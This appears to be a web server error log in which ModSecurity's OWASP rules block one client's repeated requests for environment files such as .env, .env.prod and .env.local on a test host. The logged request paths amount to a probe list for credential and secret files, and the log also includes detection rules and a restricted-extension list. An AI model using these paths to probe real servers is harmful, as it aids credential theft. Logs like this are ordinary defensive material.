[Wed Dec 10 07:47:52.100350 2025] [:error] [pid 636935] [client 45.148.10.247:35948] [client 45.148.10.247] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/website/.env"] [unique_id "aTkXmGHv40YZWlW-2790-wAAAAA"]
[Wed Dec 10 07:47:52.100537 2025] [:error] [pid 636935] [client 45.148.10.247:35948] [client 45.148.10.247] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/website/.env"] [unique_id "aTkXmGHv40YZWlW-2790-wAAAAA"]
[Wed Dec 10 07:47:52.139673 2025] [:error] [pid 636935] [client 45.148.10.247:35948] [client 45.148.10.247] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /development/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/development/.env"] [unique_id "aTkXmGHv40YZWlW-2790_AAAAAA"]
[Wed Dec 10 07:47:52.139928 2025] [:error] [pid 636935] [client 45.148.10.247:35948] [client 45.148.10.247] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/development/.env"] [unique_id "aTkXmGHv40YZWlW-2790_AAAAAA"]
[Wed Dec 10 07:47:52.140116 2025] [:error] [pid 636935] [client 45.148.10.247:35948] [client 45.148.10.247] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/development/.env"] [unique_id "aTkXmGHv40YZWlW-2790_AAAAAA"]
[Wed Dec 10 07:47:52.340892 2025] [:error] [pid 637204] [client 45.148.10.247:35954] [client 45.148.10.247] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aTkXmOtcX02MNS9MxJgQywAAAAk"]
[Wed Dec 10 07:47:52.341190 2025] [:error] [pid 637204] [client 45.148.10.247:35954] [client 45.148.10.247] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aTkXmOtcX02MNS9MxJgQywAAAAk"]
[Wed Dec 10 07:47:52.341431 2025] [:error] [pid 637204] [client 45.148.10.247:35954] [client 45.148.10.247] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aTkXmOtcX02MNS9MxJgQywAAAAk"]
[Wed Dec 10 07:47:52.404542 2025] [:error] [pid 637204] [client 45.148.10.247:35954] [client 45.148.10.247] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/shared/config/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/shared/config/.env"] [unique_id "aTkXmOtcX02MNS9MxJgQzAAAAAk"]
[Wed Dec 10 07:47:52.404778 2025] [:error] [pid 637204] [client 45.148.10.247:35954] [client 45.148.10.247] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/shared/config/.env"] [unique_id "aTkXmOtcX02MNS9MxJgQzAAAAAk"]
[Wed Dec 10 07:47:52.404974 2025] [:error] [pid 637204] [client 45.148.10.247:35954] [client 45.148.10.247] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/shared/config/.env"] [unique_id "aTkXmOtcX02MNS9MxJgQzAAAAAk"]
[Wed Dec 10 07:47:52.468562 2025] [:error] [pid 637204] [client 45.148.10.247:35954] [client 45.148.10.247] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/shared/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/shared/.env"] [unique_id "aTkXmOtcX02MNS9MxJgQzQAAAAk"]
[Wed Dec 10 07:47:52.468829 2025] [:error] [pid 637204] [client 45.148.10.247:35954] [client 45.148.10.247] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/shared/.env"] [unique_id "aTkXmOtcX02MNS9MxJgQzQAAAAk"]
[Wed Dec 10 07:47:52.469020 2025] [:error] [pid 637204] [client 45.148.10.247:35954] [client 45.148.10.247] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/shared/.env"] [unique_id "aTkXmOtcX02MNS9MxJgQzQAAAAk"]
[Wed Dec 10 07:47:52.711909 2025] [:error] [pid 637204] [client 45.148.10.247:35954] [client 45.148.10.247] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /node/.env_example"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/node/.env_example"] [unique_id "aTkXmOtcX02MNS9MxJgQ0AAAAAk"]
[Wed Dec 10 07:47:52.712146 2025] [:error] [pid 637204] [client 45.148.10.247:35954] [client 45.148.10.247] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/node/.env_example"] [unique_id "aTkXmOtcX02MNS9MxJgQ0AAAAAk"]
[Wed Dec 10 07:47:52.712343 2025] [:error] [pid 637204] [client 45.148.10.247:35954] [client 45.148.10.247] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/node/.env_example"] [unique_id "aTkXmOtcX02MNS9MxJgQ0AAAAAk"]
[Wed Dec 10 07:47:52.835441 2025] [:error] [pid 637204] [client 45.148.10.247:35954] [client 45.148.10.247] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.production.local"] [unique_id "aTkXmOtcX02MNS9MxJgQ0QAAAAk"]
[Wed Dec 10 07:47:52.835678 2025] [:error] [pid 637204] [client 45.148.10.247:35954] [client 45.148.10.247] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.production.local"] [unique_id "aTkXmOtcX02MNS9MxJgQ0QAAAAk"]
[Wed Dec 10 07:47:52.835877 2025] [:error] [pid 637204] [client 45.148.10.247:35954] [client 45.148.10.247] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.production.local"] [unique_id "aTkXmOtcX02MNS9MxJgQ0QAAAAk"]
[Wed Dec 10 07:47:52.965440 2025] [:error] [pid 637204] [client 45.148.10.247:35954] [client 45.148.10.247] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "aTkXmOtcX02MNS9MxJgQ0gAAAAk"]
[Wed Dec 10 07:47:52.965802 2025] [:error] [pid 637204] [client 45.148.10.247:35954] [client 45.148.10.247] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "aTkXmOtcX02MNS9MxJgQ0gAAAAk"]
[Wed Dec 10 07:47:52.966066 2025] [:error] [pid 637204] [client 45.148.10.247:35954] [client 45.148.10.247] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "aTkXmOtcX02MNS9MxJgQ0gAAAAk"]
[Wed Dec 10 07:47:55.064512 2025] [:error] [pid 636979] [client 45.148.10.247:35958] [client 45.148.10.247] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.example"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "aTkXm0gy26Zu7JFzi64JfQAAAAY"]
[Wed Dec 10 07:47:55.064750 2025] [:error] [pid 636979] [client 45.148.10.247:35958] [client 45.148.10.247] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "aTkXm0gy26Zu7JFzi64JfQAAAAY"]
[Wed Dec 10 07:47:55.064941 2025] [:error] [pid 636979] [client 45.148.10.247:35958] [client 45.148.10.247] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "aTkXm0gy26Zu7JFzi64JfQAAAAY"]
[Wed Dec 10 07:47:55.133098 2025] [:error] [pid 636939] [client 45.148.10.247:35960] [client 45.148.10.247] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.stage"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.stage"] [unique_id "aTkXm7CnovWtbeVvHnHWmAAAAAQ"]
[Wed Dec 10 07:47:55.133382 2025] [:error] [pid 636939] [client 45.148.10.247:35960] [client 45.148.10.247] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.stage"] [unique_id "aTkXm7CnovWtbeVvHnHWmAAAAAQ"]
[Wed Dec 10 07:47:55.133623 2025] [:error] [pid 636939] [client 45.148.10.247:35960] [client 45.148.10.247] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.stage"] [unique_id "aTkXm7CnovWtbeVvHnHWmAAAAAQ"]
[Wed Dec 10 07:47:55.506956 2025] [:error] [pid 637201] [client 45.148.10.247:35966] [client 45.148.10.247] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.old"] [unique_id "aTkXm6NE19-36a8V4yFQkQAAAAc"]
[Wed Dec 10 07:47:55.507077 2025] [:error] [pid 637201] [client 45.148.10.247:35966] [client 45.148.10.247] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.old"] [unique_id "aTkXm6NE19-36a8V4yFQkQAAAAc"]
[Wed Dec 10 07:47:55.507289 2025] [:error] [pid 637201] [client 45.148.10.247:35966] [client 45.148.10.247] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.old"] [unique_id "aTkXm6NE19-36a8V4yFQkQAAAAc"]
[Wed Dec 10 07:47:55.507475 2025] [:error] [pid 637201] [client 45.148.10.247:35966] [client 45.148.10.247] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.old"] [unique_id "aTkXm6NE19-36a8V4yFQkQAAAAc"]
[Wed Dec 10 07:47:58.556163 2025] [:error] [pid 637203] [client 45.148.10.247:35970] [client 45.148.10.247] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env_sample"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env_sample"] [unique_id "aTkXnjXuWi0ZC6S9l0nhCQAAAAg"]
[Wed Dec 10 07:47:58.556410 2025] [:error] [pid 637203] [client 45.148.10.247:35970] [client 45.148.10.247] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env_sample"] [unique_id "aTkXnjXuWi0ZC6S9l0nhCQAAAAg"]
[Wed Dec 10 07:47:58.556590 2025] [:error] [pid 637203] [client 45.148.10.247:35970] [client 45.148.10.247] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env_sample"] [unique_id "aTkXnjXuWi0ZC6S9l0nhCQAAAAg"]
[Wed Dec 10 07:48:00.553177 2025] [:error] [pid 642264] [client 45.148.10.247:51872] [client 45.148.10.247] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.prod"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "aTkXoJV8tnhi0nExSI591QAAAAo"]
[Wed Dec 10 07:48:00.553416 2025] [:error] [pid 642264] [client 45.148.10.247:51872] [client 45.148.10.247] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "aTkXoJV8tnhi0nExSI591QAAAAo"]
[Wed Dec 10 07:48:00.553598 2025] [:error] [pid 642264] [client 45.148.10.247:51872] [client 45.148.10.247] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "aTkXoJV8tnhi0nExSI591QAAAAo"]
